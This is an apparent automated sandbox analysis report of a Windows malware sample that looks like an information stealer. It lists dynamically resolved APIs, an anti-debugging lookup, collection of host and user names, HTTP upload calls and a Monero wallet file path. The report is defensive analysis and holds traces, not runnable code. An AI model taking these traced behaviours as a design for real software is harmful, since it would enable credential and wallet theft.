15283->15284 15285 cb21cc 15284->15285 15286 cba8a0 lstrcpy 15285->15286 15287 cb21d5 15286->15287 15288 cba9b0 4 API calls 15287->15288 15289 cb21f6 15288->15289 15290 cba8a0 lstrcpy 15289->15290 15291 cb21ff 15290->15291 15880 cb7ed0 GetSystemInfo wsprintfA 15291->15880 15294 cba9b0 4 API calls 15295 cb221f 15294->15295 15296 cba8a0 lstrcpy 15295->15296 15297 cb2228 15296->15297 15298 cba9b0 4 API calls 15297->15298 15299 cb2247 15298->15299 15300 cba8a0 lstrcpy 15299->15300 15301 cb2250 15300->15301 15302 cba9b0 4 API calls 15301->15302 15303 cb2270 15302->15303 15304 cba8a0 lstrcpy 15303->15304 15305 cb2279 15304->15305 15882 cb8100 GetProcessHeap RtlAllocateHeap 15305->15882 15308 
cba9b0 4 API calls 15309 cb2299 15308->15309 15310 cba8a0 lstrcpy 15309->15310 15311 cb22a2 15310->15311 15312 cba9b0 4 API calls 15311->15312 15313 cb22c1 15312->15313 15314 cba8a0 lstrcpy 15313->15314 15315 cb22ca 15314->15315 15316 cba9b0 4 API calls 15315->15316 15317 cb22eb 15316->15317 15318 cba8a0 lstrcpy 15317->15318 15319 cb22f4 15318->15319 15888 cb87c0 15319->15888 15322 cba920 3 API calls 15323 cb231e 15322->15323 15324 cba8a0 lstrcpy 15323->15324 15325 cb2327 15324->15325 15326 cba9b0 4 API calls 15325->15326 15327 cb2351 15326->15327 15328 cba8a0 lstrcpy 15327->15328 15329 cb235a 15328->15329 15330 cba9b0 4 API calls 15329->15330 15331 cb237a 15330->15331 15332 cba8a0 lstrcpy 15331->15332 15333 cb2383 15332->15333 15334 cba9b0 4 API calls 15333->15334 15335 cb23a2 15334->15335 15336 cba8a0 lstrcpy 15335->15336 15337 cb23ab 15336->15337 15893 cb81f0 15337->15893 15339 cb23c2 15340 cba920 3 API calls 15339->15340 15341 cb23d5 15340->15341 15342 cba8a0 lstrcpy 15341->15342 15343 cb23de 15342->15343 15344 cba9b0 4 API calls 15343->15344 15345 cb240a 15344->15345 15346 cba8a0 lstrcpy 15345->15346 15347 cb2413 15346->15347 15348 cba9b0 4 API calls 15347->15348 15349 cb2432 15348->15349 15350 cba8a0 lstrcpy 15349->15350 15351 cb243b 15350->15351 15352 cba9b0 4 API calls 15351->15352 15353 cb245c 15352->15353 15354 cba8a0 lstrcpy 15353->15354 15355 cb2465 15354->15355 15356 cba9b0 4 API calls 15355->15356 15357 cb2484 15356->15357 15358 cba8a0 lstrcpy 15357->15358 15359 cb248d 15358->15359 15360 cba9b0 4 API calls 15359->15360 15361 cb24ae 15360->15361 15362 cba8a0 lstrcpy 15361->15362 15363 cb24b7 15362->15363 15901 cb8320 15363->15901 15365 cb24d3 15366 cba920 3 API calls 15365->15366 15367 cb24e6 15366->15367 15368 cba8a0 lstrcpy 15367->15368 15369 cb24ef 15368->15369 15370 cba9b0 4 API calls 15369->15370 15371 cb2519 15370->15371 15372 cba8a0 lstrcpy 15371->15372 15373 cb2522 15372->15373 15374 cba9b0 4 API calls 15373->15374 15375 cb2543 15374->15375 
15376 cba8a0 lstrcpy 15375->15376 15377 cb254c 15376->15377 15378 cb8320 17 API calls 15377->15378 15379 cb2568 15378->15379 15380 cba920 3 API calls 15379->15380 15381 cb257b 15380->15381 15382 cba8a0 lstrcpy 15381->15382 15383 cb2584 15382->15383 15384 cba9b0 4 API calls 15383->15384 15385 cb25ae 15384->15385 15386 cba8a0 lstrcpy 15385->15386 15387 cb25b7 15386->15387 15388 cba9b0 4 API calls 15387->15388 15389 cb25d6 15388->15389 15390 cba8a0 lstrcpy 15389->15390 15391 cb25df 15390->15391 15392 cba9b0 4 API calls 15391->15392 15393 cb2600 15392->15393 15394 cba8a0 lstrcpy 15393->15394 15395 cb2609 15394->15395 15937 cb8680 15395->15937 15397 cb2620 15398 cba920 3 API calls 15397->15398 15399 cb2633 15398->15399 15400 cba8a0 lstrcpy 15399->15400 15401 cb263c 15400->15401 15402 cb265a lstrlen 15401->15402 15403 cb266a 15402->15403 15404 cba740 lstrcpy 15403->15404 15405 cb267c 15404->15405 15406 ca1590 lstrcpy 15405->15406 15407 cb268d 15406->15407 15947 cb5190 15407->15947 15409 cb2699 15409->13841 15411 cbaad0 15410->15411 15412 ca5009 InternetOpenUrlA 15411->15412 15413 ca5021 15412->15413 15414 ca502a InternetReadFile 15413->15414 15415 ca50a0 InternetCloseHandle InternetCloseHandle 15413->15415 15414->15413 15416 ca50ec 15415->15416 15416->13845 16132 ca98d0 15417->16132 15419 cb0759 15420 cb0a38 15419->15420 15421 cb077d 15419->15421 15422 ca1590 lstrcpy 15420->15422 15424 cb0799 StrCmpCA 15421->15424 15423 cb0a49 15422->15423 16308 cb0250 15423->16308 15426 cb0843 15424->15426 15427 cb07a8 15424->15427 15430 cb0865 StrCmpCA 15426->15430 15429 cba7a0 lstrcpy 15427->15429 15431 cb07c3 15429->15431 15432 cb0874 15430->15432 15469 cb096b 15430->15469 15433 ca1590 lstrcpy 15431->15433 15434 cba740 lstrcpy 15432->15434 15435 cb080c 15433->15435 15437 cb0881 15434->15437 15438 cba7a0 lstrcpy 15435->15438 15436 cb099c StrCmpCA 15439 cb09ab 15436->15439 15440 cb0a2d 15436->15440 15441 cba9b0 4 API calls 15437->15441 15442 cb0823 15438->15442 15444 ca1590 lstrcpy 
15439->15444 15440->13849 15445 cb08ac 15441->15445 15443 cba7a0 lstrcpy 15442->15443 15446 cb083e 15443->15446 15447 cb09f4 15444->15447 15448 cba920 3 API calls 15445->15448 16135 cafb00 15446->16135 15450 cba7a0 lstrcpy 15447->15450 15451 cb08b3 15448->15451 15452 cb0a0d 15450->15452 15453 cba9b0 4 API calls 15451->15453 15454 cba7a0 lstrcpy 15452->15454 15455 cb08ba 15453->15455 15457 cb0a28 15454->15457 16251 cb0030 15457->16251 15469->15436 15791 cba7a0 lstrcpy 15790->15791 15792 ca1683 15791->15792 15793 cba7a0 lstrcpy 15792->15793 15794 ca1695 15793->15794 15795 cba7a0 lstrcpy 15794->15795 15796 ca16a7 15795->15796 15797 cba7a0 lstrcpy 15796->15797 15798 ca15a3 15797->15798 15798->14672 15800 ca47c6 15799->15800 15801 ca4838 lstrlen 15800->15801 15802 cbaad0 15801->15802 15803 ca4848 InternetCrackUrlA 15802->15803 15804 ca4867 15803->15804 15804->14749 15806 cba740 lstrcpy 15805->15806 15807 cb8b74 15806->15807 15808 cba740 lstrcpy 15807->15808 15809 cb8b82 GetSystemTime 15808->15809 15810 cb8b99 15809->15810 15811 cba7a0 lstrcpy 15810->15811 15812 cb8bfc 15811->15812 15812->14764 15814 cba931 15813->15814 15815 cba988 15814->15815 15817 cba968 lstrcpy lstrcat 15814->15817 15816 cba7a0 lstrcpy 15815->15816 15818 cba994 15816->15818 15817->15815 15818->14768 15820 ca4e13 HttpSendRequestA 15819->15820 15820->14883 15822 ca4eee 15821->15822 15823 ca9af9 LocalAlloc 15821->15823 15822->14770 15822->14773 15823->15822 15824 ca9b14 CryptStringToBinaryA 15823->15824 15824->15822 15825 ca9b39 LocalFree 15824->15825 15825->15822 15954 cb77a0 15826->15954 15829 cb76c6 RegOpenKeyExA 15830 cb76e7 RegQueryValueExA 15829->15830 15831 cb7704 RegCloseKey 15829->15831 15830->15831 15832 cb1c1e 15831->15832 15832->15125 15834 cb1c99 15833->15834 15834->15139 15836 cb1e09 15835->15836 15836->15181 15838 cb7a9a wsprintfA 15837->15838 15839 cb1e84 15837->15839 15838->15839 15839->15195 15841 cb7b4d 15840->15841 15842 cb1efe 15840->15842 15961 cb8d20 LocalAlloc CharToOemW 

                                        Control-flow Graph

                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,009D1738), ref: 00CB98A1
                                        • GetProcAddress.KERNEL32(77190000,009D1768), ref: 00CB98BA
                                        • GetProcAddress.KERNEL32(77190000,009D1678), ref: 00CB98D2
                                        • GetProcAddress.KERNEL32(77190000,009D1618), ref: 00CB98EA
                                        • GetProcAddress.KERNEL32(77190000,009D1510), ref: 00CB9903
                                        • GetProcAddress.KERNEL32(77190000,009D8B48), ref: 00CB991B
                                        • GetProcAddress.KERNEL32(77190000,009C55E8), ref: 00CB9933
                                        • GetProcAddress.KERNEL32(77190000,009C5408), ref: 00CB994C
                                        • GetProcAddress.KERNEL32(77190000,009D16F0), ref: 00CB9964
                                        • GetProcAddress.KERNEL32(77190000,009D16D8), ref: 00CB997C
                                        • GetProcAddress.KERNEL32(77190000,009D15B8), ref: 00CB9995
                                        • GetProcAddress.KERNEL32(77190000,009D1690), ref: 00CB99AD
                                        • GetProcAddress.KERNEL32(77190000,009C5448), ref: 00CB99C5
                                        • GetProcAddress.KERNEL32(77190000,009D15A0), ref: 00CB99DE
                                        • GetProcAddress.KERNEL32(77190000,009D16A8), ref: 00CB99F6
                                        • GetProcAddress.KERNEL32(77190000,009C5568), ref: 00CB9A0E
                                        • GetProcAddress.KERNEL32(77190000,009D1750), ref: 00CB9A27
                                        • GetProcAddress.KERNEL32(77190000,009D1780), ref: 00CB9A3F
                                        • GetProcAddress.KERNEL32(77190000,009C55A8), ref: 00CB9A57
                                        • GetProcAddress.KERNEL32(77190000,009D15D0), ref: 00CB9A70
                                        • GetProcAddress.KERNEL32(77190000,009C5688), ref: 00CB9A88
                                        • LoadLibraryA.KERNEL32(009D15E8,?,00CB6A00), ref: 00CB9A9A
                                        • LoadLibraryA.KERNEL32(009D1540,?,00CB6A00), ref: 00CB9AAB
                                        • LoadLibraryA.KERNEL32(009D1558,?,00CB6A00), ref: 00CB9ABD
                                        • LoadLibraryA.KERNEL32(009D1570,?,00CB6A00), ref: 00CB9ACF
                                        • LoadLibraryA.KERNEL32(009D17B0,?,00CB6A00), ref: 00CB9AE0
                                        • GetProcAddress.KERNEL32(76850000,009D1798), ref: 00CB9B02
                                        • GetProcAddress.KERNEL32(77040000,009D1600), ref: 00CB9B23
                                        • GetProcAddress.KERNEL32(77040000,009D1630), ref: 00CB9B3B
                                        • GetProcAddress.KERNEL32(75A10000,009D9068), ref: 00CB9B5D
                                        • GetProcAddress.KERNEL32(75690000,009C5508), ref: 00CB9B7E
                                        • GetProcAddress.KERNEL32(776F0000,009D8B98), ref: 00CB9B9F
                                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00CB9BB6
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00CB9BAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 554d998e0f6e434cf98f705a9dc91df3fab8c3b9636cdb303ff029e9fe94f950
                                        • Instruction ID: e70c7daf81228ef985952e15bc709cf049de0610c50b8eb37611fef4ad6ff30c
                                        • Opcode Fuzzy Hash: 554d998e0f6e434cf98f705a9dc91df3fab8c3b9636cdb303ff029e9fe94f950
                                        • Instruction Fuzzy Hash: 8CA160B55002889FC358EFAAEDC89563BF9F74C30170D853EB605AB264E739B449CB16

                                        Control-flow Graph

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA460F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00CA479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4638, 00CA46D8, 00CA475A, 00CA4765, 00CA473F, 00CA4643, 00CA466D, 00CA4713, 00CA45C7, 00CA45D2, 00CA46CD, 00CA4678, 00CA474F, 00CA4617, 00CA46B7, 00CA4622, 00CA46AC, 00CA477B, 00CA46C2, 00CA471E, 00CA4683, 00CA45DD, 00CA4770, 00CA4657, 00CA45F3, 00CA462D, 00CA4734, 00CA45E8, 00CA4662, 00CA4729
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one string, repeated 30 times, once per xref listed above)
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: ea15ffbf8011afa6d3a7e4f1ce9673622df62570f1b5c55dfbea9db06bef973b
                                        • Instruction ID: e076dfe4d49963d078eb8a185b85037fc531e2d4df84415a07fe5082f072937e
                                        • Opcode Fuzzy Hash: ea15ffbf8011afa6d3a7e4f1ce9673622df62570f1b5c55dfbea9db06bef973b
                                        • Instruction Fuzzy Hash: 5E4115616C27047EEF68B7A4EC52F9DB762DF52708F5050EEFA0052280CFB87582C526

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA4915
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA4ABA
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CC0DDB,00000000,?,?,00000000,?,",00000000,?,009DF2A0), ref: 00CA4DE8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CA4E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA4E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA4E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA4EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA4EC5
                                        • HttpOpenRequestA.WININET(00000000,009DF250,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA4B15
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA4ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: ce813f867d5b39341a13f7d04860c77449a5635d408ff9b06d8e4eb9d5722e7b
                                        • Instruction ID: 7f57a25da6431477275263945b8b60b708af9d9ff31906a66085447d23eafda4
                                        • Opcode Fuzzy Hash: ce813f867d5b39341a13f7d04860c77449a5635d408ff9b06d8e4eb9d5722e7b
                                        • Instruction Fuzzy Hash: 2912FA72910218AADB15EB91DCA2FEEB338BF15300F5041A9F14676491EF712F49EF62
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7910
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 7c3af5c50fd144d61bed44cd373ec382e16ff415fdecbc4b377cd8473d183301
                                        • Instruction ID: 3cc703521b1983fda92d6749ec5063e595aefeaf123dbe4e138aacd7f787f2c5
                                        • Opcode Fuzzy Hash: 7c3af5c50fd144d61bed44cd373ec382e16ff415fdecbc4b377cd8473d183301
                                        • Instruction Fuzzy Hash: 1E0186B1D04248EFCB14DF95DD49BAABBB8F744B11F10426DF945E7280D7745A048BA1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: c9fd847d001c8fb8ed099c9661721d5eb62331a06d08e46169188bcfc9b09644
                                        • Instruction ID: 0759b7305431c57cc2b3699d01dffbf2feb30131518bfc2eb447542da7c1595e
                                        • Opcode Fuzzy Hash: c9fd847d001c8fb8ed099c9661721d5eb62331a06d08e46169188bcfc9b09644
                                        • Instruction Fuzzy Hash: B5F04FB1944248AFCB04DF99DD89FAEBBB8EB04711F10026AFA05A2680D77525048BA2
                                        APIs
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 18aa04da5e6ff873a807d90a039b94c9599eda26641542422d39683604d6552b
                                        • Instruction ID: ec702687337f6e576c3cf56484995a1bf2ec359fab07e5ef1d2c860924cfcfc2
                                        • Opcode Fuzzy Hash: 18aa04da5e6ff873a807d90a039b94c9599eda26641542422d39683604d6552b
                                        • Instruction Fuzzy Hash: 1BD05E7490030CDFCB00DFE1D8896EDBB78FB08316F040569ED0572340EA306486CAA6

                                         Control-flow Graph (basic blocks as id address-range: API calls → successor ids; the rendered graph and its executed/not-executed colouring are not reproduced)
                                         • 633 cb9c10-cb9c1a → 634, 635
                                         • 634 cb9c20-cba031: GetProcAddress × 43 → 635
                                         • 635 cba036-cba0ca: LoadLibraryA × 8 → 636, 637
                                         • 636 cba0cc-cba141: GetProcAddress × 5 → 637
                                         • 637 cba146-cba14d → 638, 639
                                         • 638 cba153-cba211: GetProcAddress × 8 → 639
                                         • 639 cba216-cba21d → 640, 641
                                         • 641 cba21f-cba293: GetProcAddress × 5 → 640
                                         • 640 cba298-cba29f → 642, 643
                                         • 643 cba2a5-cba332: GetProcAddress × 6 → 642
                                         • 642 cba337-cba33e → 644, 645
                                         • 645 cba344-cba41a: GetProcAddress × 9 → 644
                                         • 644 cba41f-cba426 → 646, 647
                                         • 646 cba428-cba49d: GetProcAddress × 5 → 647
                                         • 647 cba4a2-cba4a9 → 648, 649
                                         • 648 cba4ab-cba4d7: GetProcAddress × 2 → 649
                                         • 649 cba4dc-cba4e3 → 650, 651
                                         • 651 cba4e5-cba510: GetProcAddress × 2 → 650
                                         • 650 cba515-cba51c → 652, 653
                                         • 653 cba522-cba60d: GetProcAddress × 10 → 652
                                         • 652 cba612-cba619 → 654, 655
                                         • 654 cba61b-cba678: GetProcAddress × 4 → 655
                                         • 655 cba67d-cba684 → 656, 657
                                         • 657 cba686-cba699: GetProcAddress → 656
                                         • 656 cba69e-cba6a5 → 658, 659
                                         • 659 cba6a7-cba703: GetProcAddress × 4 → 658
                                         • 658 cba708-cba709 (no successors)
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,009C5528), ref: 00CB9C2D
                                        • GetProcAddress.KERNEL32(77190000,009C53E8), ref: 00CB9C45
                                        • GetProcAddress.KERNEL32(77190000,009D8E10), ref: 00CB9C5E
                                        • GetProcAddress.KERNEL32(77190000,009D8F78), ref: 00CB9C76
                                        • GetProcAddress.KERNEL32(77190000,009D8E28), ref: 00CB9C8E
                                        • GetProcAddress.KERNEL32(77190000,009DD6C8), ref: 00CB9CA7
                                        • GetProcAddress.KERNEL32(77190000,009CA6B8), ref: 00CB9CBF
                                        • GetProcAddress.KERNEL32(77190000,009DD788), ref: 00CB9CD7
                                        • GetProcAddress.KERNEL32(77190000,009DD758), ref: 00CB9CF0
                                        • GetProcAddress.KERNEL32(77190000,009DD710), ref: 00CB9D08
                                        • GetProcAddress.KERNEL32(77190000,009DD698), ref: 00CB9D20
                                        • GetProcAddress.KERNEL32(77190000,009C54E8), ref: 00CB9D39
                                        • GetProcAddress.KERNEL32(77190000,009C5588), ref: 00CB9D51
                                        • GetProcAddress.KERNEL32(77190000,009C55C8), ref: 00CB9D69
                                        • GetProcAddress.KERNEL32(77190000,009C5648), ref: 00CB9D82
                                        • GetProcAddress.KERNEL32(77190000,009DD6E0), ref: 00CB9D9A
                                        • GetProcAddress.KERNEL32(77190000,009DD7E8), ref: 00CB9DB2
                                        • GetProcAddress.KERNEL32(77190000,009CA820), ref: 00CB9DCB
                                        • GetProcAddress.KERNEL32(77190000,009C5708), ref: 00CB9DE3
                                        • GetProcAddress.KERNEL32(77190000,009DD7D0), ref: 00CB9DFB
                                        • GetProcAddress.KERNEL32(77190000,009DD728), ref: 00CB9E14
                                        • GetProcAddress.KERNEL32(77190000,009DD7B8), ref: 00CB9E2C
                                        • GetProcAddress.KERNEL32(77190000,009DD740), ref: 00CB9E44
                                        • GetProcAddress.KERNEL32(77190000,009C5668), ref: 00CB9E5D
                                        • GetProcAddress.KERNEL32(77190000,009DD6F8), ref: 00CB9E75
                                        • GetProcAddress.KERNEL32(77190000,009DD6B0), ref: 00CB9E8D
                                        • GetProcAddress.KERNEL32(77190000,009DD770), ref: 00CB9EA6
                                        • GetProcAddress.KERNEL32(77190000,009DD7A0), ref: 00CB9EBE
                                        • GetProcAddress.KERNEL32(77190000,009DD638), ref: 00CB9ED6
                                        • GetProcAddress.KERNEL32(77190000,009DD650), ref: 00CB9EEF
                                        • GetProcAddress.KERNEL32(77190000,009DD668), ref: 00CB9F07
                                        • GetProcAddress.KERNEL32(77190000,009DD680), ref: 00CB9F1F
                                        • GetProcAddress.KERNEL32(77190000,009DD200), ref: 00CB9F38
                                        • GetProcAddress.KERNEL32(77190000,009CF808), ref: 00CB9F50
                                        • GetProcAddress.KERNEL32(77190000,009DD308), ref: 00CB9F68
                                        • GetProcAddress.KERNEL32(77190000,009DD218), ref: 00CB9F81
                                        • GetProcAddress.KERNEL32(77190000,009C56A8), ref: 00CB9F99
                                        • GetProcAddress.KERNEL32(77190000,009DD1A0), ref: 00CB9FB1
                                        • GetProcAddress.KERNEL32(77190000,009C56E8), ref: 00CB9FCA
                                        • GetProcAddress.KERNEL32(77190000,009DD0B0), ref: 00CB9FE2
                                        • GetProcAddress.KERNEL32(77190000,009DD0C8), ref: 00CB9FFA
                                        • GetProcAddress.KERNEL32(77190000,009C5388), ref: 00CBA013
                                        • GetProcAddress.KERNEL32(77190000,009C53A8), ref: 00CBA02B
                                        • LoadLibraryA.KERNEL32(009DD128,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA03D
                                        • LoadLibraryA.KERNEL32(009DD1B8,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA04E
                                        • LoadLibraryA.KERNEL32(009DD0E0,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA060
                                        • LoadLibraryA.KERNEL32(009DD0F8,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA072
                                        • LoadLibraryA.KERNEL32(009DD2D8,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA083
                                        • LoadLibraryA.KERNEL32(009DD080,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA095
                                        • LoadLibraryA.KERNEL32(009DD248,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA0A7
                                        • LoadLibraryA.KERNEL32(009DD1D0,?,00CB5CA3,00CC0AEB,?,?,?,?,?,?,?,?,?,?,00CC0AEA,00CC0AE3), ref: 00CBA0B8
                                        • GetProcAddress.KERNEL32(77040000,009C5168), ref: 00CBA0DA
                                        • GetProcAddress.KERNEL32(77040000,009DD320), ref: 00CBA0F2
                                        • GetProcAddress.KERNEL32(77040000,009D8C08), ref: 00CBA10A
                                        • GetProcAddress.KERNEL32(77040000,009DD170), ref: 00CBA123
                                        • GetProcAddress.KERNEL32(77040000,009C5128), ref: 00CBA13B
                                        • GetProcAddress.KERNEL32(704D0000,009CA7A8), ref: 00CBA160
                                        • GetProcAddress.KERNEL32(704D0000,009C5068), ref: 00CBA179
